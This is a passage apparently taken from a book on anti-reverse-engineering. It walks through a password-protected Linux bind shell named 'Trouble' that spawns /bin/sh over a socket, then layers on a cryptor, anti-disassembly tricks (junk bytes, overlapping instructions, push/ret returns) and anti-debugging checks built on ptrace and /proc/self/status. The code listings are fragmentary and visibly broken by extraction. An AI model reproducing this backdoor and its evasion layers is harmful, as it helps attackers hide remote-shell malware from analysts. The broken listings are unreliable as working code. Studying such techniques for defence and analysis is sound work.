[ 80%] Building C object trouble/CMakeFiles/trouble.dir/src/trouble.c.o
[ 90%] Building C object trouble/CMakeFiles/trouble.dir/src/rc4.c.o
[100%] Linking C executable trouble
The bind shell password is: tS5MOaog4uurRWn0Lxo4K6CF9YnWIR5V
[+] Encrypted 0x2310
[100%] Built target trouble
Now for the fun part. Lets check out how check_password() looks in a disassembler.
albino-lobster@ubuntu:~/antire_book/chap_4_static_analysis/dontpanic/build$ radare2 .\
/trouble/trouble
Warning: Cannot initialize dynamic strings
-- Welcome to "IDA - the roguelike"
[0x004003b0]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze len bytes of instructions for references (aar)
[x] Analyze function calls (aac)
[ ] [*] Use -AA or aaaa to perform additional experimental analysis.
[x] Constructing a function name for fcn.* and sym.func.* functions (aan))
[0x004003b0]> pdf @ sym.check_password
;-- section..check_password:
/ (fcn) sym.check_password 41
Chapter 4: Fighting Off String Analysis 161
| sym.check_password ();
| ; CALL XREF from 0x004002f3 (unk)
| ; DATA XREF from 0x004002a0 (unk)
| ; DATA XREF from 0x004002c3 (unk)
| ; DATA XREF from 0x004002e1 (unk)
| 0x00402310 e6cf out 0xcf, al
| 0x00402312 6c insb byte [rdi], dx
| 0x00402313 f394 xchg eax, esp
| 0x00402315 15962bbb6f adc eax, 0x6fbb2b96
| 0x0040231a 5c pop rsp
| 0x0040231b de3da92ac6e0 fidivr word [0xffffffffe1064dca]
| 0x00402321 a2bd0a32467d. movabs byte [0xdc41317d46320abd], al
| 0x0040232a 2462 and al, 0x62
| 0x0040232c b60d mov dh, 0xd
| 0x0040232e 5d pop rbp
| 0x0040232f b6ac mov dh, 0xac
| 0x00402331 383d5907d68c cmp byte [0xffffffff8d162a90], bh ; [0x4:1]=2
\ 0x00402337 02c7 add al, bh
Radare2 does produce disassembly for check_pasword(), but its totally useless. Pretty
good for just trying to hide a string, huh? Encrypting the function has other benefits
that will make runtime and memory analysis more difficult. Well cover that in later
chapters. Remember though, just because you encrypted the function doesnt mean
a reverse engineer isnt going to decrypt it. The following disassembly obviously
doesnt have the symbols stripped, but you can see that a reverse engineer would be
able to discover all the elements to do the decryption.
Creating a Cryptor
As you saw at the end of the previous chapter, a reverse engineer doing static analysis
can recover all the variables they need to decrypt check_password() by looking at the
disassembly right before the call to check_password(). Is is possible to prevent that?
The answer is always ultimately no. You really cant prevent it. However, you can
make it more difficult. Lets write a cryptor to encrypt more of the binary!
Whats a Cryptor?
A cryptor encrypts a binary and adds additional logic to decrypt the binary
at runtime. A couple open source examples are:
1. cryptelf
2. midgetpack
Similar to a cryptor, a packer compresses the binary. The most widely used
cryptor is UPX[upx].
https://dl.packetstormsecurity.net/crypt/linux/cryptelf.c
https://github.com/arisada/midgetpack
Chapter 4: Fighting Off String Analysis 163
chap_4_static_analysis/dontpanic/cryptor/CMakeLists.txt
project(cryptor CXX)
cmake_minimum_required(VERSION 3.0)
add_executable(${PROJECT_NAME} src/cryptor.cpp)
chap_4_static_analysis/dontpanic/cryptor/src/cryptor.cpp
#include <cstdlib>
#include <iostream>
#include <fstream>
#include <iomanip>
#include <cstring>
#include <elf.h>
/**
* This tool implements a *very* simple cryptor. The "encryption" scheme is just
* a one by XOR. Obviously, this isn't something you'd use to truly protect
* a binary, but it is a interesting tool to begin to understand how cryptors
* work.
*
* This tool will "encrypt" only the PF_X segment. Which means that .data is
* left visible.
*/
Chapter 4: Fighting Off String Analysis 164
/**
* Adds the decryption stub to the end of the first PF_X segment. Rewrites the
* entry_point address and xor "encrypts" the PF_X segment from just after the
* program headers to the end of the segment.
*
* \param[in,out] p_data the ELF binary
* \return true on success and false otherwise
*/
bool add_cryptor(std::string& p_data)
{
if (p_data[0] != 0x7f || p_data[1] != 'E' || p_data[2] != 'L' ||
p_data[3] != 'F')
{
std::cerr << "[-] Bad magic" << std::endl;
return 0;
}
if (segment == NULL)
{
std::cerr << "[-] Couldn't find an executable segment." << std::endl;
return false;
}
// We can't encrypt the ELF header or the program headers or we'll break the
// loader. So begin encryption right after the program headers. This logic
// asumes that the ELF header and the program headers fall within the
Chapter 4: Fighting Off String Analysis 165
// segment variable
uint32_t encrypt_start = ehdr->e_phoff + (ehdr->e_phentsize * ehdr->e_phnum);
uint32_t virt_start = segment->p_vaddr + encrypt_start;
// store the real offset so we can overwrite it with the stubs address.
uint32_t actual = ehdr->e_entry;
return true;
}
if(!add_cryptor(input))
{
return EXIT_FAILURE;
}
std::cout << "Failed to wopen the provided file: " << p_argv[1] << std::endl;
return EXIT_FAILURE;
}
outputFile.write(input.data(), input.length());
outputFile.close();
return EXIT_SUCCESS;
}
Youll need to add the project to the top level CMakeLists.txt in dontpanic.
chap_4_static_analysis/dontpanic/CMakeList.txt
project(dontpanic C)
cmake_minimum_required(VERSION 3.0)
add_subdirectory(encryptFunctions)
add_subdirectory(cryptor)
add_subdirectory(trouble)
project(trouble C)
cmake_minimum_required(VERSION 3.0)
# This will create a 32 byte "password" for the bind shell. This command
# is only run when "cmake" is run, so if you want to generate a new password
# then "cmake ..; make" should be run from the command line.
exec_program("/bin/sh"
${CMAKE_CURRENT_SOURCE_DIR}
ARGS "-c 'cat /dev/urandom | tr -dc a-zA-Z0-9 | head -c 32'"
OUTPUT_VARIABLE random_password )
set(CMAKE_C_COMPILER musl-gcc)
Chapter 4: Fighting Off String Analysis 168
add_custom_target(addLDS
COMMAND sed -i -e 's,-o,${CMAKE_CURRENT_SOURCE_DIR}/trouble_layout.\
lds -o,g' ./CMakeFiles/trouble.dir/link.txt)
add_dependencies(${PROJECT_NAME} addLDS)
# After the build is successful, display the random password to the user
add_custom_command(TARGET ${PROJECT_NAME} POST_BUILD
COMMAND ${CMAKE_COMMAND} -E echo
"The bind shell password is:" ${random_password})
add_custom_command(TARGET ${PROJECT_NAME}
POST_BUILD
COMMAND ../encryptFunctions/encryptFunctions ${CMAKE_CURRENT_BINAR\
Y_DIR}/${PROJECT_NAME})
add_custom_command(TARGET ${PROJECT_NAME}
POST_BUILD
COMMAND ../cryptor/cryptor ${CMAKE_CURRENT_BINARY_DIR}/${PROJECT_N\
AME})
Cryptor is quite simple. It appends some assembly to the first LOAD segment and
edits the entry point to point into this appended assembly. The appended assembly
will execute the xor deobfuscation over the LOAD segment and then jump to the
actual entry point. Thats it.
albino-lobster@ubuntu:~/antire_book/chap_4_static_analysis/dontpanic/build$ readelf -\
h ./trouble/trouble
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: EXEC (Executable file)
Machine: Advanced Micro Devices X86-64
Version: 0x1
Entry point address: 0x403154
Start of program headers: 64 (bytes into file)
Start of section headers: 22752 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 56 (bytes)
Number of program headers: 4
Size of section headers: 64 (bytes)
Number of section headers: 17
Section header string table index: 14
albino-lobster@ubuntu:~/antire_book/chap_4_static_analysis/dontpanic/build$ readelf -\
l ./trouble/trouble
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
LOAD 0x0000000000000000 0x0000000000400000 0x0000000000400000
0x0000000000003154 0x0000000000003154 RWE 200000
LOAD 0x0000000000003fe8 0x0000000000603fe8 0x0000000000603fe8
0x00000000000001f8 0x0000000000000538 RW 200000
Chapter 4: Fighting Off String Analysis 170
Notice how the entry point starts at the very end of the first load segment? This char-
acteristic of Cryptor has nothing to do with the actual encryption and decryption,
but its interesting to note because disassemblers have difficulty handling it. Check
out how Radare2 fails.
albino-lobster@ubuntu:~/antire_book/chap_4_static_analysis/dontpanic/build$ radare2 .\
/trouble/trouble
Warning: Cannot initialize dynamic strings
Warning: read (init_offset)
-- In soviet russia, radare2 debugs you!
[0x00403154]> aaa
[Cannot find function 'entry0' at 0x00403154 entry0 (aa)
[x] Analyze all flags starting with sym. and entry0 (aa)
[Warning: Searching xrefs in non-executable regiones (aar)
[x] Analyze len bytes of instructions for references (aar)
[Oops invalid rangen calls (aac)
[x] Analyze function calls (aac)
[ ] [*] Use -AA or aaaa to perform additional experimental analysis.
[x] Constructing a function name for fcn.* and sym.func.* functions (aan))
[0x00403154]> pdf
p: Cannot find function at 0x00403154
[0x00403154]>
Why is Radare2 having trouble with this? Cryptor is taking advantage of the fact that
when the first LOAD segment is loaded into memory that it will be page aligned.
That means there is unused space at the end of the LOAD segment that gets mapped.
Chapter 4: Fighting Off String Analysis 171
Cryptor inserts the decryption stub into this space. However, since Radare2 doesnt
expect anything beyond the program header it cant find the entry point (aka the
decryption stub).
Similarly, IDA pops up two different warning dialogs.
First Warning
Second Warning
IDA does attempt to disassemble some of the binary but it doesnt go well because
all of the code has been obfuscated by Cryptor.
Also, like Radare2, IDA doesnt contain the decryption stub in the dissassembly. Is
there any way for a reverse engineer to disassemble the entry point? Yes! GDB to the
rescue!
Chapter 4: Fighting Off String Analysis 172
At first GDB didnt want to disassemble the stub. However, once Trouble has been
started there it has no problem disassembling the function.
Chapter 5: Obstructing Code
Flow Analysis
Eventually, a reverse engineer will break down all the little file format hacks
and obfuscation that protects your binary and expose the disassembly for reverse
engineering. However, there are a number of ways that you can write your code to
make a reverse engineers job more difficult.
If you follow the code reference youll find yourself in the main function. The call to
check_password() is quite clear.
Chapter 5: Obstructing Code Flow Analysis 175
Lets try to hide this direct call using a function pointer. Below the check_password()
function I added this declaration:
Now lets recompile Trouble and see what IDA says about the cross references to
check_password() now.
The code breaks down to the indirect function call that I wanted to make. How does
IDA know the call is to check_password()? If you double click the cs:indirect_call
link in IDA then you jump to this:
Well, that will do it. IDA must be looking at the value stored in indirect_call and
using that value to determine where the call is going. Lets try initializing the function
pointer with NULL instead of check_password().
Thats an improvement! The code reference is no longer there and the data reference
is up towards the top of main().
The call to check_password() looks the same as it did before the change to initialize
indirect_call with NULL.
However, indirect_call different. It has moved from .data to .bss and has no default
value.
Chapter 5: Obstructing Code Flow Analysis 178
Pretty good. But maybe you can remove the data cross reference to check_password()
by messing with the address stored in indirect_call. Lets change the assignment at
the top of main() a little.
We then have to adjust the function poiner before making the call to check_pass-
word().
If you recompile Trouble and drop it into IDA you should see this.
Chapter 5: Obstructing Code Flow Analysis 179
Nice. No cross references! In just four lines of code you were able to remove all cross
references to check_password().
Signals
Another code flow obfuscation technique is to use signals. A signal is an IPC
mechanism that can be used to alter the execution flow of a program. If youve ever
used a terminal youre almost certainly familiar with signals. For example, when you
hit Ctrl-C to terminate a program youve actually sent the SIGINT signal. There
are many signals and you can find them all by looking at the signal man page.
Using the function sigaction you can register a function to handle a specific signal.
For example, if you register a function to handle SIGINT and you hit Ctrl-C while
program is running then your function will be called instead of terminating the
program. Thats pretty useful, right? You can also send signals to your program using
the kill function. How is that useful? Instead of directly calling a function, you can
register the function with sigaction() and generate a signal with kill() everytime you
want to call the function.
For example, consider this version of the Trouble bind shell.
https://en.wikipedia.org/wiki/Unix_signal
man 7 signal
man sigaction
man 2 kill
Chapter 5: Obstructing Code Flow Analysis 180
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <stdbool.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include "xor_string.h"
void spawn_shell()
{
char* empty[] = { NULL };
char binsh[] = { '/', 'b', 'i', 'n', '/', 's', 'h', 0 };
execve(binsh, empty, empty);
}
/**
* This implements a fairly simple bind shell. The server first requires a
* password before allowing access to the shell. The password is currently
* randomly generated each time 'cmake ..' is run. The server has no shutdown
* mechanism so it will run until killed.
*/
int main(int p_argc, char* p_argv[])
{
(void)p_argc;
(void)p_argv;
sVal.sa_flags = SA_SIGINFO;
sVal.sa_sigaction = spawn_shell;
sigaction(SIGUSR1, &sVal, NULL);
while (true)
{
int client_sock = accept(sock, NULL, NULL);
if (client_sock < 0)
{
perror("Accept call failed");
return EXIT_FAILURE;
}
if (check_password(password_input))
{
close(client_sock);
return EXIT_FAILURE;
}
dup2(client_sock, 0);
dup2(client_sock, 1);
dup2(client_sock, 2);
kill(getpid(), SIGUSR1);
close(client_sock);
return EXIT_SUCCESS;
}
close(client_sock);
}
}
In the above, I introduced a new function called spawn_shell() that contains the
logic for executing /bin/sh. Notice how its never directly called though? Instead
of directly calling spawn_shell() this line triggers its execution:
kill(getpid(), SIGUSR1);
The spawn_shell() function is executed when Trouble receives the SIGUSR1 signal.
This makes static analysis harder because it forces the reverse engineer to track down
all of the sigaction() calls to figure out what function gets called for each signal.
Otherwise, all the reverse engineer just sees this:
Chapter 5: Obstructing Code Flow Analysis 183
Early Return
Another way to hide Troubles logic is to trick the dissasembler into exiting the
check_password() function early. One way to do this is to push an address onto
the stack and immeaditely return. This will cause the program to return to the
address on the stack. There is actually a very good write up on this technique on
malwintor.com but well create our own example as well.
In order to use the early return technique, youll create a label in check_password()
and use inline assembly to push the address of the label onto the stack. The updated
check_password() looks like this:
https://www.malwinator.com/2015/11/27/anti-disassembly-techniques-used-by-malware-a-primer-part-2/
Chapter 5: Obstructing Code Flow Analysis 184
return_here:
XOR_STRING31(pass, password, 0xaa);
There are two interesting things here: 1. Ive introduced the optimize attribute into
the function declaration. This will keep the optimization level for this function at
O1. Ive done this because higher levels of optimization seem to move the label
location and generally break the program. 2. Ive used a GCC extension to get the
address of the return_here: label. Using && in front of a label will get the address
of the lable.
If you disassemble this code you will quickly see that nothing is obfuscated.
Obfuscation fail
As you saw in a previous section, IDA followed the address that check_password()
pushed onto the stack. You need to obfuscate or calculate the address of the label in
some way that will prevent the disassembler from following the logic. Try this:
return_here:
XOR_STRING31(pass, password, 0xaa);
You can see that all Ive done is substracted and added 0x400000 from the label
address. However, the disassembly is much more to my liking.
Chapter 5: Obstructing Code Flow Analysis 186
Very cool, huh? Before you get too excited though there is still a problem. In graph
view, IDA looks similar to Radare2. However, in text view you can see that IDA
continues to disassemble the code you are trying to hide.
Chapter 5: Obstructing Code Flow Analysis 187
Notice how IDA continues to disassemble at 0x40077B? It marks this code as having
no cross references, but continues to disassemble it. IDA must just keep trying to
disassemble code after it has completed a function. However, maybe if you insert
some non-code then IDA will stop disassembling? To insert some data use the
.string directive.
Chapter 5: Obstructing Code Flow Analysis 188
return_here:
XOR_STRING31(pass, password, 0xaa);
Now if you look at the disassembly, youll see that IDA doesnt disassemble the
majority of check_password().
http://vxheaven.org/lib/vsc04.html
Chapter 5: Obstructing Code Flow Analysis 190
GDB disassembles linearly. Knowing this you can hide the mov $0x787, %rdi
instruction by introducing extra bytes that wont get executed, but GDB will treat as
valid code. Update check_password() to look like this:
Chapter 5: Obstructing Code Flow Analysis 191
asm volatile(
"jmp unaligned\n"
".short 0xe8\n"
"unaligned:");
asm volatile(
"push %0\n"
"ret\n"
".string \"\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\""
:
: "g"(label_address));
return_here:
XOR_STRING31(pass, password, 0xaa);
You should notice a new asm block that adds a jump to a new label (unaligned). All
the new asm block does is jump over the value 0xe8 that has been inserted into the
middle of the function. However, look at it in GDB again.
Chapter 5: Obstructing Code Flow Analysis 192
As you can see, at 0x40076d a jmp to 0x400771 now exists. Right after that GDB
has disassembled five bytes to be callq 0xffffffffc8074f74. Remember that we only
inserted one byte. It appears that GDB has taken our one invalid byte and combined it
with four valid bytes in order to create a new call instruction that isnt actually there.
Fortunately for the reverse engineer, x64 is made up of variable length instructions
and is therefore self-healing. The disassembly gets back to normal at 0x40077e.
Unfortunately, this trick doesnt work on Radare2 or IDA. Here is what IDA says:
Chapter 5: Obstructing Code Flow Analysis 193
Jump! Jump!
As you can see, IDA appears to realize that the byte at 0x40076f should never be
executed so it skips over it entirely. What if you didnt use an absolute jump to the
unaligned label? Perhaps if we use two conditional jumps (jump zero and jump not
zero) back to back then IDA would disassemble the extra byte? Again, malwinator
has an excellent write up on this technique.. You need to update check_password()
like this:
https://www.malwinator.com/2015/11/22/anti-disassembly-used-in-malware-a-primer/
Chapter 5: Obstructing Code Flow Analysis 194
asm volatile(
"jz unaligned+1\n"
"jnz unaligned+1\n"
"unaligned:\n"
".byte 0xe8\n");
asm volatile(
"push %0\n"
"ret\n"
".string \"\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\""
:
: "g"(label_address));
return_here:
XOR_STRING31(pass, password, 0xaa);
asm volatile(
"xor %%rax, %%rax\n"
"jz always_here + 1\n"
"always_here:\n"
".byte 0xe8\n"
: :
: "%rax");
asm volatile(
"jz unaligned+1\n"
"jnz unaligned+1\n"
"unaligned:\n"
".byte 0xe8\n");
asm volatile(
"push %0\n"
"ret\n"
".string \"\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\""
:
: "g"(label_address));
return_here:
XOR_STRING31(pass, password, 0xaa);
You can see that Ive added a new asm block that clears rax and jumps to always_-
Chapter 5: Obstructing Code Flow Analysis 197
Overlapping Instructions
In the previous examples, you inserted a byte that would never be executed by the
program. While this technique successfully obfuscated check_password(), a clever
disassembler might be able to identify the unused byte and display the correct
disassembly. However, there is a techique that even a clever disassembler would
struggle with: overlapping instructions. If you can write code that is executed twice
but represents two different instructions then you have introduced a real problem to
both the disassembler and the reverse engineer.
The most well known example of this technique, that I know of, can be found in
Chapter 5: Obstructing Code Flow Analysis 199
the book Practical Malware Analysis by Michael Sikorski and Andrew Honig.
The following updated version of check_password() is very similar to the version
explained in Practical Malware Analysis except youll be writing in x64 and, as
always, youll actually be able to compile it.
asm volatile(
"mov_ins:\n"
"mov $2283, %%rax\n"
"xor %%rax, %%rax\n"
"jz mov_ins+3\n"
".byte 0xe8\n"
: :
: "%rax");
asm volatile(
"xor %%rax, %%rax\n"
"jz always_here + 1\n"
"always_here:\n"
".byte 0xe8\n"
: :
: "%rax");
asm volatile(
"jz unaligned+1\n"
"jnz unaligned+1\n"
"unaligned:\n"
".byte 0xe8\n");
https://www.nostarch.com/malware
Chapter 5: Obstructing Code Flow Analysis 200
asm volatile(
"push %0\n"
"ret\n"
".string \"\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\""
:
: "g"(label_address));
return_here:
XOR_STRING31(pass, password, 0xaa);
asm volatile(
"mov_ins:\n"
"mov $2283, %%rax\n"
"xor %%rax, %%rax\n"
"jz mov_ins+3\n"
".byte 0xe8\n"
: :
: "%rax");
It probably isnt exactly clear what is going on here, so lets look at the disassembly.
Chapter 5: Obstructing Code Flow Analysis 201
Step three is the interesting part because mov_ins+3 is right in the middle of the
original mov instruction. Is there an instruction at mov_ins+3? To test if that is the
case undefine the code where mov_ins starts and mark mov_ins+3 as code. IDA
should now look like this:
You can see there is a valid jump at mov_ins+3. The jump skips over the remaining
code that you defined in the asm block down to the next bit of legitimate code. Thats
it! We reuse bytes in the mov instruction to hide the real jump to the code that follows
the asm block.
Chapter 6: Evading the
Debugger
For this chapter youll use the version of the Trouble bind shell found in the chap_-
6_debugger directory. This version of the bind shell uses many of the obfuscation
techniques that youve previously learned in the book.
Trace Me
Before you can catch debuggers like GDB you need to know how they work. Essential
to the operation of a debugger is the ptrace system call. The man page says:
The ptrace() system call provides a means by which one process (the
tracer) may observe and control the execution of another process (the
tracee), and examine and change the tracees memory and registers.
It is primarily used to implement breakpoint debugging and system call
tracing
One noteable aspect of ptrace is that only one tracer can control a tracee at a time.
This means if GDB is tracing Trouble then no other process can trace Trouble. This
is useful from an anti debugging point of view because you are able to determine if
a debugger is attached to Trouble simply by calling ptrace(). To try this out, update
Troubles main() to detect tracing. Note that the following code will require #include
<sys/ptrace.h> to be added as well.
man ptrace
Chapter 6: Evading the Debugger 204
If you recompile Trouble with the ptrace() code and execute Trouble with GDB then
youll find that Trouble terminates early. Note the line Tracer detected! below.
However, if you execute Trouble without GDB then it executes without issue. Whats
the deal? The new code you added makes a call to ptrace using PTRACE_TRACEME.
If Trouble wasnt started with GDB then this PTRACE_TRACEME call sets the parent
program as tracing program. In this case, the parent program is /bin/bash. To confirm
this, run Trouble and check its /proc/<pid>/status file. Here is an example of what
you should see.
The two most important lines in the above are PPid (parent pid) and TracerPid.
Both of these show the value of 2402. You can confirm that is bash by using the ps
command.
If Trouble was executed via GDB then the PTRACE_TRACEME call you added will
fail and Trouble will exit. This is because Trouble is already being traced by GDB so
it cant set the parent process as the tracer. Remember there can only be one tracer
at a time. In this way we prevent ptrace based debuggers from attaching to Trouble.
As another example, consider the gcore utility. gcore is a tool that produces core
dumps of running programs. This is particularly useful if a program is using a cryptor,
like Trouble does, since the core dump will capture the unencrypted version of the
program which can then be loaded into IDA or another disassembler. However, if we
use the PTRACE_TRACEME logic then gcore will fail.
Chapter 6: Evading the Debugger 206
gcore cant create a core due to another process already tracing Trouble
albino-lobster@ubuntu:~$ sudo gcore `pidof trouble`
Could not attach to process. If your uid matches the uid of the target
process, check the setting of /proc/sys/kernel/yama/ptrace_scope, or try
again as the root user. For more details, see /etc/sysctl.d/10-ptrace.conf
warning: process 60023 is already traced by process 2402
ptrace: Operation not permitted.
You can't do that without a process to debug.
The program is not being run.
gcore: failed to create core.60023
Notice that gcore complains that Trouble is already being traced by process 2402?
A final example is the strace utility. strace lists all of the system calls that a program
makes. However, due to its use of ptrace Trouble is able to detect it.
One thing to be concerned about with the PTRACE_TRACEME approach is that you
are giving an unknown program, bash in this case, full control over your program.
Who knows if bash can be trusted to trace Trouble?
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>
#include <sys/mman.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/ptrace.h>
#include "rc4.h"
#include "xor_string.h"
asm volatile(
"mov_ins:\n"
"mov $2283, %%rax\n"
"xor %%rax, %%rax\n"
"jz mov_ins+3\n"
".byte 0xe8\n"
: :
: "%rax");
asm volatile(
"xor %%rax, %%rax\n"
Chapter 6: Evading the Debugger 208
asm volatile(
"jz unaligned+1\n"
"jnz unaligned+1\n"
"unaligned:\n"
".byte 0xe8\n");
asm volatile(
"push %0\n"
"ret\n"
".string \"\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\""
:
: "g"(label_address));
return_here:
XOR_STRING31(pass, password, 0xaa);
void trap_handler()
{
int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock == -1)
{
fprintf(stderr, "Failed to create the socket.");
exit(EXIT_FAILURE);
}
sizeof(bind_addr));
if (bind_result != 0)
{
perror("Bind call failed");
exit(EXIT_FAILURE);
}
while (true)
{
int client_sock = accept(sock, NULL, NULL);
if (client_sock < 0)
{
perror("Accept call failed");
exit(EXIT_FAILURE);
}
if (check_password(password_input))
{
close(client_sock);
exit(EXIT_FAILURE);
}
dup2(client_sock, 0);
dup2(client_sock, 1);
dup2(client_sock, 2);
close(client_sock);
}
exit(EXIT_SUCCESS);
}
// generate a sigtrap
kill(getpid(), SIGTRAP);
return EXIT_SUCCESS;
}
Chapter 6: Evading the Debugger 211
If you run this version of Trouble via GDB then it will exit without ever calling
trap_handler().
As you can see from the above, GDB receives the SIGTRAP but doesnt pass it on to
Trouble so that trap_handler() gets executed.
Chapter 6: Evading the Debugger 212
There is a problem with this technique though. If the debugger attaches to Trouble
after the SIGTRAP has been generated then it wont be detected. In the following
example, gcore has no problem generating a core from Trouble.
gcore is able to attach to Trouble and create the core file. Unfortunately, there is
little our SIGTRAP method can do to stop this. Even if you generate more SIGTRAP
signals, this method simply doesnt prevent other processes from attaching.
Becoming Attached
Another well known method uses PTRACE_ATTACH from a forked child. Consider
the following changes to Trouble:
int status = 0;
wait(&status);
ptrace(PTRACE_CONT, getppid(), NULL, NULL);
The code above will fork() a child process that becomes the tracer of the parent
Trouble process via PTRACE_ATTACH. It will also automatically begin tracing
any forks that Trouble creates due to the PTRACE_SETOPTIONS call. This largely
addresses the issues that we had with the PTRACEME method because we now know
the tracing program: Trouble! This also mostly addresses the issues we had with
SIGTRAP. No one can simply attach to the main Trouble process since it is being
traced by a child.
However, this approach does have issues:
albino-lobster@ubuntu:~$ ps fa
PID TTY STAT TIME COMMAND
6352 pts/21 Ss 0:00 bash
6956 pts/21 R+ 0:00 \_ ps fa
6230 pts/9 Ss 0:00 bash
6942 pts/9 S 0:00 \_ sudo su
6943 pts/9 S 0:00 \_ su
6944 pts/9 S 0:00 \_ bash
6954 pts/9 S+ 0:00 \_ ./trouble/trouble
6955 pts/9 S+ 0:00 \_ ./trouble/trouble
albino-lobster@ubuntu:~$ sudo gcore 6954
Could not attach to process. If your uid matches the uid of the target
process, check the setting of /proc/sys/kernel/yama/ptrace_scope, or try
again as the root user. For more details, see /etc/sysctl.d/10-ptrace.conf
warning: process 6954 is already traced by process 6955
ptrace: Operation not permitted.
You can't do that without a process to debug.
The program is not being run.
gcore: failed to create core.6954
albino-lobster@ubuntu:~$ sudo kill -9 6955
albino-lobster@ubuntu:~$ sudo gcore 6954
0x0000000000401328 in __syscall ()
Saved corefile core.6954
albino-lobster@ubuntu:~$
As you can see, before process 6955 gets killed gcore cant create a core file for 6955.
However, after sudo kill -9 6955 is executed, gcore is able to produce a core file.
However, you can easily fix this problem by using the ptrace option PTRACE_O_-
EXITKILL. This will send SIGKILL signals to all tracees if the tracer is killed. You
can update the code to look like this:
Now if an attacker tries to kill the tracer then Trouble will simply disappear.
Chapter 6: Evading the Debugger 215
albino-lobster@ubuntu:~$ ps fa
PID TTY STAT TIME COMMAND
6352 pts/21 Ss 0:00 bash
7071 pts/21 R+ 0:00 \_ ps fa
6230 pts/9 Ss 0:00 bash
7041 pts/9 S 0:00 \_ sudo su
7042 pts/9 S 0:00 \_ su
7043 pts/9 S 0:00 \_ bash
7068 pts/9 S+ 0:00 \_ ./trouble/trouble
7069 pts/9 S+ 0:00 \_ ./trouble/trouble
albino-lobster@ubuntu:~$ sudo gcore 7068
Could not attach to process. If your uid matches the uid of the target
process, check the setting of /proc/sys/kernel/yama/ptrace_scope, or try
again as the root user. For more details, see /etc/sysctl.d/10-ptrace.conf
warning: process 7068 is already traced by process 7069
ptrace: Operation not permitted.
You can't do that without a process to debug.
The program is not being run.
gcore: failed to create core.7068
albino-lobster@ubuntu:~$ sudo kill 7069
albino-lobster@ubuntu:~$ sudo gcore 7068
ptrace: No such process.
You can't do that without a process to debug.
The program is not being run.
gcore: failed to create core.7068
albino-lobster@ubuntu:~$ ps fa
PID TTY STAT TIME COMMAND
6352 pts/21 Ss 0:00 bash
7086 pts/21 R+ 0:00 \_ ps fa
6230 pts/9 Ss 0:00 bash
7041 pts/9 S 0:00 \_ sudo su
7042 pts/9 S 0:00 \_ su
7043 pts/9 S+ 0:00 \_ bash
/proc/self/status
In the previous section you learned a method for protecting Trouble from debuggers
using a forked tracer. While the parent Trouble process is protected, the child tracer
Chapter 6: Evading the Debugger 216
is still vulnerable to debuggers attaching to it. What can be done to help mitigate
that? One way is that you can use the proc file system to see if a tracer is tracing our
tracer. Here is an example from the command line.
albino-lobster@ubuntu:~$ ps fa
PID TTY STAT TIME COMMAND
6352 pts/21 Ss 0:00 bash
7126 pts/21 R+ 0:00 \_ ps fa
6230 pts/9 Ss 0:00 bash
7111 pts/9 S 0:00 \_ sudo su
7112 pts/9 S 0:00 \_ su
7113 pts/9 S 0:00 \_ bash
7123 pts/9 S+ 0:00 \_ ./trouble/trouble
7124 pts/9 S+ 0:00 \_ ./trouble/trouble
albino-lobster@ubuntu:~$ cat /proc/7123/status | grep Pid:
Pid: 7123
PPid: 7113
TracerPid: 7124
In the above output, Ive pushed the status file for PID 7123 through grep. The output
shows the current Pid (7123), the parents Pid (7113), and the tracers Pid (7124). We
can update Trouble to also look up this information using /proc/self/status.
/*
* Checks the "TracerPid" entry in the /proc/self/status file. If the value
* is not zero then a debugger has attached. If a debugger is attached then
* signal to the parent pid and exit.
*/
void check_proc_status()
{
FILE* proc_status = fopen("/proc/self/status", "r");
if (proc_status == NULL)
{
return;
}
char line[1024] = { };
Chapter 6: Evading the Debugger 217
/**
* This implements a fairly simple bind shell. The server first requires a
* password before allowing access to the shell. The password is currently
* randomly generated each time 'cmake ..' is run. The server has no shutdown
* mechanism so it will run until killed.
*/
int main(int p_argc, char* p_argv[])
{
(void)p_argc;
(void)p_argv;
int status = 0;
wait(&status);
ptrace(PTRACE_CONT, getppid(), NULL, NULL);
Ive updated the tracers while(true) loop to use a non-blocking waitpid call so that
it can check that TracerPid: line in /proc/self/status every second. While this wont
stop a debugger from attaching it will stop the debugger from being attached for a
long time. For example:
Chapter 6: Evading the Debugger 219
albino-lobster@ubuntu:~$ ps fa
PID TTY STAT TIME COMMAND
6352 pts/21 Ss 0:00 bash
11050 pts/21 R+ 0:00 \_ ps fa
6230 pts/9 Ss 0:00 bash
11032 pts/9 S+ 0:00 \_ sudo ./trouble/trouble
11033 pts/9 S+ 0:00 \_ ./trouble/trouble
11034 pts/9 S+ 0:00 \_ ./trouble/trouble
albino-lobster@ubuntu:~$ sudo gdb -p 11034
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.04) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
Attaching to process 11034
